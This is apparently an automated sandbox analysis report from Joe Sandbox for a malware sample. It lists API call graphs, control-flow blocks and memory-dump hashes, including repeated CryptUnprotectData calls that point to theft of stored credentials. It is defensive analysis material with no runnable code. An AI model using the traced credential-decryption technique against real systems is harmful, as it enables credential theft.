                                                                                                              execution_graph 43153 39a920c0 43156 39a920ed 43153->43156 43154 39a9213c 43154->43154 43156->43154 43157 39a917fc 43156->43157 43158 39a91807 43157->43158 43163 39a917d0 43158->43163 43160 39a9229c 43167 395695e8 43160->43167 43161 39a922a5 43161->43154 43164 39a917db 43163->43164 43171 39a9181c 43164->43171 43166 39a922f5 43166->43160 43168 395695f3 43167->43168 43170 3956ec47 43168->43170 43175 3956e7f4 43168->43175 43170->43161 43172 39a91827 43171->43172 43173 39a92461 GetCurrentThreadId 43172->43173 43174 39a9248b 43172->43174 43173->43174 43174->43166 43177 3956e7ff 43175->43177 43176 3956f111 43176->43170 43177->43176 43180 3956fab0 43177->43180 43184 3956faa1 43177->43184 43181 3956fadb 43180->43181 43182 3956fb8a 43181->43182 43188 39a900c0 43181->43188 43185 3956fadb 43184->43185 43186 3956fb8a 43185->43186 43187 39a900c0 2 API calls 43185->43187 43187->43186 43192 39a90110 43188->43192 43196 39a90104 43188->43196 43193 39a90178 CreateWindowExW 43192->43193 43195 39a90234 43193->43195 43197 39a90178 CreateWindowExW 43196->43197 43199 39a90234 43197->43199 43199->43199 43200 39a92020 SetTimer 43201 39a9208c 43200->43201 43202 ad030 43203 ad048 43202->43203 43204 ad0a2 43203->43204 43209 39a902c8 43203->43209 43214 39a902b7 43203->43214 43219 39a91bd0 43203->43219 43225 39a91bc0 43203->43225 43210 39a902ee 43209->43210 43212 39a91bc0 2 API calls 43210->43212 43213 39a91bd0 2 API calls 43210->43213 43211 39a9030f 43211->43204 43212->43211 43213->43211 43215 39a902ee 43214->43215 43217 39a91bc0 2 API calls 43215->43217 43218 39a91bd0 2 API calls 43215->43218 43216 39a9030f 43216->43204 43217->43216 43218->43216 43220 39a91bfd 43219->43220 43221 39a91c2f 43220->43221 43231 39a99b38 43220->43231 43236 39a91d58 43220->43236 43245 39a99b48 43220->43245 43226 39a91bfd 43225->43226 43227 39a91c2f 43226->43227 43228 39a99b38 CallWindowProcW 43226->43228 43229 39a99b48 CallWindowProcW 43226->43229 43230 39a91d58 2 API calls 43226->43230 43228->43227 43229->43227 43230->43227 43232 39a99b5c 43231->43232 43250 39a99bef 43232->43250 43253 39a99c00 43232->43253 43233 39a99be8 43233->43221 43237 39a91d93 43236->43237 43238 39a91d66 43236->43238 43237->43238 43239 39a91d98 43237->43239 43243 39a91d6e 43238->43243 43244 39a91dc0 CallWindowProcW 43238->43244 43240 39a917d0 GetCurrentThreadId 43239->43240 43241 39a91da4 43240->43241 43241->43221 43242 39a91dac 43242->43221 43243->43221 43244->43242 43247 39a99b5c 43245->43247 43246 39a99be8 43246->43221 43248 39a99bef CallWindowProcW 43247->43248 43249 39a99c00 CallWindowProcW 43247->43249 43248->43246 43249->43246 43251 39a99c11 43250->43251 43256 39a9b040 43250->43256 43251->43233 43254 39a99c11 43253->43254 43255 39a9b040 CallWindowProcW 43253->43255 43254->43233 43255->43254 43259 39a91dc0 43256->43259 43260 39a91e02 43259->43260 43262 39a91e09 43259->43262 43261 39a91e5a CallWindowProcW 43260->43261 43260->43262 43261->43262 43262->43251 43263 17b158 43264 17b174 43263->43264 43272 38fc0198 43264->43272 43276 38fc0188 43264->43276 43265 17b1a3 43280 3956bd48 43265->43280 43273 38fc01a4 43272->43273 43290 38fcc638 43273->43290 43274 38fc01da 43274->43265 43277 38fc01a4 43276->43277 43279 38fcc638 CryptUnprotectData 43277->43279 43278 38fc01da 43278->43265 43279->43278 43281 3956bd54 43280->43281 43322 3956bd98 43281->43322 43284 39a92730 43285 39a9273f 43284->43285 43352 39a90938 43285->43352 43292 38fcc66a 43290->43292 43291 38fccaf9 43291->43274 43292->43291 43294 38fccf01 43292->43294 43295 38fccf10 43294->43295 43299 38fcd550 43295->43299 43307 38fcd540 43295->43307 43296 38fccf80 43296->43292 43300 38fcd575 43299->43300 43301 38fcd629 43299->43301 43300->43301 43304 38fcd550 CryptUnprotectData 43300->43304 43305 38fcd540 CryptUnprotectData 43300->43305 43315 38fcd730 43300->43315 43319 38fcd1ec 43301->43319 43304->43301 43305->43301 43308 38fcd575 43307->43308 43309 38fcd629 43307->43309 43308->43309 43312 38fcd550 CryptUnprotectData 43308->43312 43313 38fcd540 CryptUnprotectData 43308->43313 43314 38fcd730 CryptUnprotectData 43308->43314 43310 38fcd1ec CryptUnprotectData 43309->43310 43311 38fcd7f5 43310->43311 43311->43296 43312->43309 43313->43309 43314->43309 43316 38fcd745 43315->43316 43317 38fcd1ec CryptUnprotectData 43316->43317 43318 38fcd7f5 43317->43318 43318->43301 43320 38fcd9e0 CryptUnprotectData 43319->43320 43321 38fcd7f5 43320->43321 43321->43296 43323 3956bdb4 43322->43323 43327 3956ce50 43323->43327 43331 3956ce60 43323->43331 43324 17b1aa 43324->43284 43328 3956ce7c 43327->43328 43335 395694b4 43328->43335 43330 3956ce9b 43330->43324 43332 3956ce7c 43331->43332 43333 395694b4 2 API calls 43332->43333 43334 3956ce9b 43333->43334 43334->43324 43336 395694bf 43335->43336 43337 3956cf4f 43336->43337 43340 3956cf30 43336->43340 43348 3956cf68 43336->43348 43337->43330 43341 3956cf3f 43340->43341 43343 3956cf58 43340->43343 43345 3956cf4f 43341->43345 43346 3956cf30 2 API calls 43341->43346 43347 3956cf68 2 API calls 43341->43347 43342 3956d021 43343->43342 43344 395695e8 2 API calls 43343->43344 43344->43342 43345->43337 43346->43345 43347->43345 43351 3956cf96 43348->43351 43349 3956d021 43349->43349 43350 395695e8 2 API calls 43350->43349 43351->43349 43351->43350 43353 39a90948 43352->43353 43354 39a90965 43353->43354 43360 39a90980 43353->43360 43356 39a9188c 43354->43356 43358 39a91897 43356->43358 43359 39a92866 43358->43359 43382 39a91934 43358->43382 43361 39a909c6 GetCurrentProcess 43360->43361 43363 39a90a18 GetCurrentThread 43361->43363 43364 39a90a11 43361->43364 43365 39a90a4e 43363->43365 43366 39a90a55 GetCurrentProcess 43363->43366 43364->43363 43365->43366 43367 39a90a8b 43366->43367 43372 39a90b4f 43367->43372 43376 39a90f31 43367->43376 43368 39a90ab3 GetCurrentThreadId 43369 39a90ae4 43368->43369 43369->43354 43378 39a90bc8 DuplicateHandle 43372->43378 43380 39a90bc0 DuplicateHandle 43372->43380 43373 39a90b8e 43373->43368 43377 39a90f4e 43376->43377 43377->43368 43379 39a90c5e 43378->43379 43379->43373 43381 39a90c5e 43380->43381 43381->43373 43389 39a9193f 43382->43389 43383 39a92e79 43384 39a92ea9 43383->43384 43385 39a92ac4 7 API calls 43383->43385 43388 39a92ed4 43384->43388 43397 39a92ac4 43384->43397 43385->43384 43387 39a92ec1 43387->43388 43403 39a9d5f8 43387->43403 43410 39a9d608 43387->43410 43388->43358 43389->43383 43389->43388 43393 39a93e40 43389->43393 43394 39a93e61 43393->43394 43395 39a93e85 43394->43395 43417 39a93ff0 43394->43417 43395->43383 43398 39a92acf 43397->43398 43399 39a90938 6 API calls 43398->43399 43402 39a9d0a1 43398->43402 43400 39a9d0bb 43399->43400 43450 39a9c544 43400->43450 43402->43387 43409 39a9d66d 43403->43409 43404 39a9d899 43405 39a90938 6 API calls 43404->43405 43407 39a9d6ba 43405->43407 43406 39a9dad0 WaitMessage 43406->43409 43407->43388 43409->43404 43409->43406 43409->43407 43457 39a9c60c 43409->43457 43416 39a9d66d 43410->43416 43411 39a9d899 43412 39a90938 6 API calls 43411->43412 43414 39a9d6ba 43412->43414 43413 39a9dad0 WaitMessage 43413->43416 43414->43388 43415 39a9c60c DispatchMessageW 43415->43416 43416->43411 43416->43413 43416->43414 43416->43415 43420 39a93ffd 43417->43420 43418 39a90938 6 API calls 43419 39a9402b 43418->43419 43421 39a94036 43419->43421 43423 39a92bec 43419->43423 43420->43418 43421->43395 43424 39a92bf7 43423->43424 43425 39a940a8 43424->43425 43427 39a92c20 43424->43427 43428 39a92c2b 43427->43428 43434 39a92c30 43428->43434 43430 39a94517 43438 39a991f0 43430->43438 43444 39a991d8 43430->43444 43431 39a94551 43431->43425 43437 39a92c3b 43434->43437 43435 39a957a0 43435->43430 43436 39a93e40 8 API calls 43436->43435 43437->43435 43437->43436 43440 39a99321 43438->43440 43441 39a99221 43438->43441 43439 39a9922d 43439->43431 43440->43431 43441->43439 43442 3956fab0 2 API calls 43441->43442 43443 3956faa1 2 API calls 43441->43443 43442->43440 43443->43440 43445 39a99221 43444->43445 43447 39a99321 43444->43447 43446 39a9922d 43445->43446 43448 3956fab0 2 API calls 43445->43448 43449 3956faa1 2 API calls 43445->43449 43446->43431 43447->43431 43448->43447 43449->43447 43452 39a9c54f 43450->43452 43451 39a9d3bb 43451->43402 43452->43451 43454 39a9c560 43452->43454 43455 39a9d3f0 OleInitialize 43454->43455 43456 39a9d454 43455->43456 43456->43451 43458 39a9e708 DispatchMessageW 43457->43458 43459 39a9e774 43458->43459 43459->43409

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 23 39a9d608-39a9d66b 24 39a9d69a-39a9d6b8 23->24 25 39a9d66d-39a9d697 23->25 30 39a9d6ba-39a9d6bc 24->30 31 39a9d6c1-39a9d6f8 24->31 25->24 33 39a9db7a-39a9db8f 30->33 35 39a9db29 31->35 36 39a9d6fe-39a9d712 31->36 39 39a9db2e-39a9db44 35->39 37 39a9d741-39a9d760 36->37 38 39a9d714-39a9d73e 36->38 45 39a9d778-39a9d77a 37->45 46 39a9d762-39a9d768 37->46 38->37 39->33 50 39a9d799-39a9d7a2 45->50 51 39a9d77c-39a9d794 45->51 48 39a9d76a 46->48 49 39a9d76c-39a9d76e 46->49 48->45 49->45 52 39a9d7aa-39a9d7b1 50->52 51->39 53 39a9d7bb-39a9d7c2 52->53 54 39a9d7b3-39a9d7b9 52->54 56 39a9d7cc 53->56 57 39a9d7c4-39a9d7ca 53->57 55 39a9d7cf-39a9d7ec call 39a9c5c0 54->55 60 39a9d941-39a9d945 55->60 61 39a9d7f2-39a9d7f9 55->61 56->55 57->55 63 39a9d94b-39a9d94f 60->63 64 39a9db14-39a9db27 60->64 61->35 62 39a9d7ff-39a9d83c 61->62 72 39a9db0a-39a9db0e 62->72 73 39a9d842-39a9d847 62->73 65 39a9d969-39a9d972 63->65 66 39a9d951-39a9d964 63->66 64->39 67 39a9d9a1-39a9d9a8 65->67 68 39a9d974-39a9d99e 65->68 66->39 70 39a9d9ae-39a9d9b5 67->70 71 39a9da47-39a9da5c 67->71 68->67 75 39a9d9e4-39a9da06 70->75 76 39a9d9b7-39a9d9e1 70->76 71->72 85 39a9da62-39a9da64 71->85 72->52 72->64 77 39a9d879-39a9d88e call 39a9c5e4 73->77 78 39a9d849-39a9d857 call 39a9c5cc 73->78 75->71 114 39a9da08-39a9da12 75->114 76->75 83 39a9d893-39a9d897 77->83 78->77 92 39a9d859-39a9d877 call 39a9c5d8 78->92 88 39a9d899-39a9d8ab call 39a90938 call 39a9c5f0 83->88 89 39a9d908-39a9d915 83->89 90 39a9dab1-39a9dace call 39a9c5c0 85->90 91 39a9da66-39a9da9f 85->91 117 39a9d8eb-39a9d903 88->117 118 39a9d8ad-39a9d8dd 88->118 89->72 106 39a9d91b-39a9d925 call 39a9c600 89->106 90->72 105 39a9dad0-39a9dafc WaitMessage 90->105 109 39a9daa8-39a9daaf 91->109 110 39a9daa1-39a9daa7 91->110 92->83 111 39a9dafe 105->111 112 39a9db03 105->112 120 39a9d934-39a9d93c call 39a9c618 106->120 121 39a9d927-39a9d92a call 39a9c60c 106->121 109->72 110->109 111->112 112->72 125 39a9da2a-39a9da45 114->125 126 39a9da14-39a9da1a 114->126 117->39 132 39a9d8df 118->132 133 39a9d8e4 118->133 120->72 128 39a9d92f 121->128 125->71 125->114 130 39a9da1c 126->130 131 39a9da1e-39a9da20 126->131 128->72 130->125 131->125 132->133 133->117
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID: <0[6
                                                                                                              • API String ID: 2061451462-690449555
                                                                                                              • Opcode ID: 9b0e49753c655f474df7d7060d5a4f16005e9d824a8850f63c5bfb07f0fff01c
                                                                                                              • Instruction ID: 0f61e21e759414bf23dbb76a7bde1b6a5e4f54b0bd7fb004500bcce333c36bd4
                                                                                                              • Opcode Fuzzy Hash: 9b0e49753c655f474df7d7060d5a4f16005e9d824a8850f63c5bfb07f0fff01c
                                                                                                              • Instruction Fuzzy Hash: 4FF15D35A103098FEB04DFA9C844BDDBBF5BF84704F55C668E809AF265DB74A985CB80

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1452 38fcd9d9-38fcda52 CryptUnprotectData 1453 38fcda5b-38fcda83 1452->1453 1454 38fcda54-38fcda5a 1452->1454 1454->1453
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(00000055,?,00000000,?,?,?,?), ref: 38FCDA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: 5b8a6f521a2fc961bd504c47d1c86b1b04638ab6ce74ad73596d7a4a9ac8828c
                                                                                                              • Instruction ID: 99c2c625eb8a3d2a6fd5f3f4d78ceb0e1106d371da7c556e28ee31e6c5b03467
                                                                                                              • Opcode Fuzzy Hash: 5b8a6f521a2fc961bd504c47d1c86b1b04638ab6ce74ad73596d7a4a9ac8828c
                                                                                                              • Instruction Fuzzy Hash: 5C1159B6800249DFDB10CF99C840BEEBFF4EF48320F148419E554A3611C3399650CFA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1457 38fcd1ec-38fcda52 CryptUnprotectData 1459 38fcda5b-38fcda83 1457->1459 1460 38fcda54-38fcda5a 1457->1460 1460->1459
                                                                                                              APIs
                                                                                                              • CryptUnprotectData.CRYPT32(00000055,?,00000000,?,?,?,?), ref: 38FCDA45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CryptDataUnprotect
                                                                                                              • String ID:
                                                                                                              • API String ID: 834300711-0
                                                                                                              • Opcode ID: f4c9bb72910393790bfe5fb656e362a79ebaf20b0a3042d0538ea4ce27111ed8
                                                                                                              • Instruction ID: 9328cc3150dd220adde49c971fed3c474f99fa2ea3bf67c880f2ee649698cecb
                                                                                                              • Opcode Fuzzy Hash: f4c9bb72910393790bfe5fb656e362a79ebaf20b0a3042d0538ea4ce27111ed8
                                                                                                              • Instruction Fuzzy Hash: 8A1136768002499FDB10DF99C845BDEBBF4EF48320F148419E614A7210C339A650CFA5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: [6
                                                                                                              • API String ID: 0-4217218497
                                                                                                              • Opcode ID: 5085efe1b70bfc20f41e7198b1df0d9bd15795f03dd47abcfddba81365e8352e
                                                                                                              • Instruction ID: 0c745ac29ed078a3f885274c589d71c2bf78be8d8f069cd9eb568283c2416c1a
                                                                                                              • Opcode Fuzzy Hash: 5085efe1b70bfc20f41e7198b1df0d9bd15795f03dd47abcfddba81365e8352e
                                                                                                              • Instruction Fuzzy Hash: CDA105B4D00209CFEB14DFA9C944BDDBBB1FF89304F208269E409AB291DB759A85CF55
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: [6
                                                                                                              • API String ID: 0-4217218497
                                                                                                              • Opcode ID: 5fcc2223dadffe748e43d2d2858ec6ba3978f1e73db5c534252682227676545c
                                                                                                              • Instruction ID: 0d6de6d6db69a6bfa0773f15d5e362ead0864ac072ed69db7d64c92eabcdbda9
                                                                                                              • Opcode Fuzzy Hash: 5fcc2223dadffe748e43d2d2858ec6ba3978f1e73db5c534252682227676545c
                                                                                                              • Instruction Fuzzy Hash: 4DA1F3B4D00209CFEB14DFA9C944BDDBBB1FF89310F208269E409A7291DB759A85CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 95f4e852c0f060b8c99a6f1be11cecbb790e2ab4e2bfc682cc14aa7bc2e5b021
                                                                                                              • Instruction ID: 2db7d7f956ccb07057906e288132300351132ce0935ea61164d5064110a99b2c
                                                                                                              • Opcode Fuzzy Hash: 95f4e852c0f060b8c99a6f1be11cecbb790e2ab4e2bfc682cc14aa7bc2e5b021
                                                                                                              • Instruction Fuzzy Hash: FEA26C70A04209DFCB15CF68C994AAEBBB2BF88310F15C56AE809DB361D735ED45CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983846239.0000000039A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 39A90000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39a90000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4f7c3fb0b7230ea549eac4206281d1e6b1e6f0be4fb85c4b314ea5b09c76103c
                                                                                                              • Instruction ID: eff6f246415f25f17c4824fefbb7eaff14cdd110c00af0939aaed4ab2206fbc5
                                                                                                              • Opcode Fuzzy Hash: 4f7c3fb0b7230ea549eac4206281d1e6b1e6f0be4fb85c4b314ea5b09c76103c
                                                                                                              • Instruction Fuzzy Hash: 7C82D274A40228DFDB24DF65C895BD9BBB2FB89301F5081E9D80AA7350DB359E81DF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 33fc0cba7c2347176e833e046c68e34784e0addc66eb3bfb2e364702f0fe172b
                                                                                                              • Instruction ID: f26d6b56a751c681d15cdb16f974496cf2398748117c19524bf3ae5ca56f1495
                                                                                                              • Opcode Fuzzy Hash: 33fc0cba7c2347176e833e046c68e34784e0addc66eb3bfb2e364702f0fe172b
                                                                                                              • Instruction Fuzzy Hash: 8872E274A01228DFDB24DF65C895B99BBB2FB89301F5081E9D80AB7364CB359E81DF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 83c23c999ac880e17f8112dc40a38df7073a7c752412d49495a0bbcacbcaf2c2
                                                                                                              • Instruction ID: d7f757a11fd2019731f35db919ecd4ca4d78182566e0593b4f757ee420547a06
                                                                                                              • Opcode Fuzzy Hash: 83c23c999ac880e17f8112dc40a38df7073a7c752412d49495a0bbcacbcaf2c2
                                                                                                              • Instruction Fuzzy Hash: A672C074E012688FEB64DF69C990BD9BBB2BB49304F5091E9D908A7361DB349EC1CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be66fe3eb73f2e3f3150e2031a7774eb2900407e493034fa2c1c8e9d745e2e83
                                                                                                              • Instruction ID: b6da236e250d65eb17494a148b8eeea340cb9344c53f374ed1ae3413f0c20875
                                                                                                              • Opcode Fuzzy Hash: be66fe3eb73f2e3f3150e2031a7774eb2900407e493034fa2c1c8e9d745e2e83
                                                                                                              • Instruction Fuzzy Hash: 3D123E30A00619DFCB14CFA9C994AADBBF2FF88314F55C06AE81AAB261D735DD45CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 47a00c7e887a47636815868efe14a83fb4e06fe0772bfc150791ec6e070d5d80
                                                                                                              • Instruction ID: fc1fcc390e501cf16a824ba2c13c9a20aaba39858a3db950f436d23c92bd1a55
                                                                                                              • Opcode Fuzzy Hash: 47a00c7e887a47636815868efe14a83fb4e06fe0772bfc150791ec6e070d5d80
                                                                                                              • Instruction Fuzzy Hash: CFE1C1B4E01218CFEB54DFA5C994B9DBBB2BF89300F2081A9D809B7391DB355A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 89f66382aeb5fac02bc8c9fbe4bafbdaf44cc0d3f4724d7ebf79145872bff3c0
                                                                                                              • Instruction ID: c4c197c4d57849ea0ff7dc99455f8b76cb6db48eeeae09a1302f2f70e564914c
                                                                                                              • Opcode Fuzzy Hash: 89f66382aeb5fac02bc8c9fbe4bafbdaf44cc0d3f4724d7ebf79145872bff3c0
                                                                                                              • Instruction Fuzzy Hash: 47D1AF74E00219CFEB54DFA5C994B9DBBB2BF88300F1081A9D809AB355DB359E86CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f95486c60c09badc1e4bb3de82c4dbacb0036a79ee253f4db153ffc807fa2572
                                                                                                              • Instruction ID: 462df433976dc5fad0b85424efcca4d36bf05e99bac8c954e34395e300c4605d
                                                                                                              • Opcode Fuzzy Hash: f95486c60c09badc1e4bb3de82c4dbacb0036a79ee253f4db153ffc807fa2572
                                                                                                              • Instruction Fuzzy Hash: 26A191B5E012288FEB14CF6AC944B9DBBF2AB89304F14D1AAD40CB7265DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4137a02ccf64ed6a6893fe8f5b35687abb5ecb8d480b721259c9b3b8ef54e1ed
                                                                                                              • Instruction ID: 22b3e888afefc89b70753d1517dd7e91ba46a23470dff5aa6afbdf1250ee5842
                                                                                                              • Opcode Fuzzy Hash: 4137a02ccf64ed6a6893fe8f5b35687abb5ecb8d480b721259c9b3b8ef54e1ed
                                                                                                              • Instruction Fuzzy Hash: 61A190B4E012288FEB14CF6AC954B9DFBF2AB89304F14D0AAD40CA7265DB745A85CF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 39264b8f7c5a563c3033e727c61c2919b6eb51de0e8fbda92f2da4c70d59eb24
                                                                                                              • Instruction ID: a17a793695ffdc5d0b613d0154eba22f18d22542edcd7d1a6abba50cf0ba5872
                                                                                                              • Opcode Fuzzy Hash: 39264b8f7c5a563c3033e727c61c2919b6eb51de0e8fbda92f2da4c70d59eb24
                                                                                                              • Instruction Fuzzy Hash: 45A183B4E012188FEB14CF6AC944B9DBBF2AF89304F14D1AAD50CB7265DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_39560000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cf118151ef37136dd8d550a70a40a3a6e877bf17d41184ccf9112a50e0c8b05c
                                                                                                              • Instruction ID: 06c1d7e4ea5e9304b926adfc607f3c458a0da513e63f635206223a31240ec440
                                                                                                              • Opcode Fuzzy Hash: cf118151ef37136dd8d550a70a40a3a6e877bf17d41184ccf9112a50e0c8b05c
                                                                                                              • Instruction Fuzzy Hash: 41A191B4E012188FEB24CF6AC954B9DFBF2AF89304F14D1AAD408B7255DB345A85CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983114946.0000000038FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38FC0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_38fc0000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fd93f260a8791b0ecd9b339c79ca1cb6923d06abe1f5d79fcbb38134f2ef5cca
                                                                                                              • Instruction ID: 7fa8f24c47deed5ef5dc73e2b6fb24afdc70a2e7bc97b2f47d4fe40f839f396a
                                                                                                              • Opcode Fuzzy Hash: fd93f260a8791b0ecd9b339c79ca1cb6923d06abe1f5d79fcbb38134f2ef5cca
                                                                                                              • Instruction Fuzzy Hash: D091E474D00309CFEB10DFA8C984B9CBBB1FF89310F209669E509A7291DB759A86CF55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2955230408.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_170000_xXUnP7uCBJ.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b8f08820874205d14a7fabbd568f8534ee1941c588b35dbd61528ef55eb12e91
                                                                                                              • Instruction ID: d0ab235c7180d5800ca52ff13f6d13f4b1cf1640de83ce8f2584a03c11fd302d
                                                                                                              • Opcode Fuzzy Hash: b8f08820874205d14a7fabbd568f8534ee1941c588b35dbd61528ef55eb12e91
                                                                                                              • Instruction Fuzzy Hash: 1191D774E00218DFEB18DFA9D944A9DBBF2BF89300F14C169E419AB365DB349941DF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2983618848.0000000039560000.00000040.00000800.00020000.00000000.sdmp, Offset: 39560000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
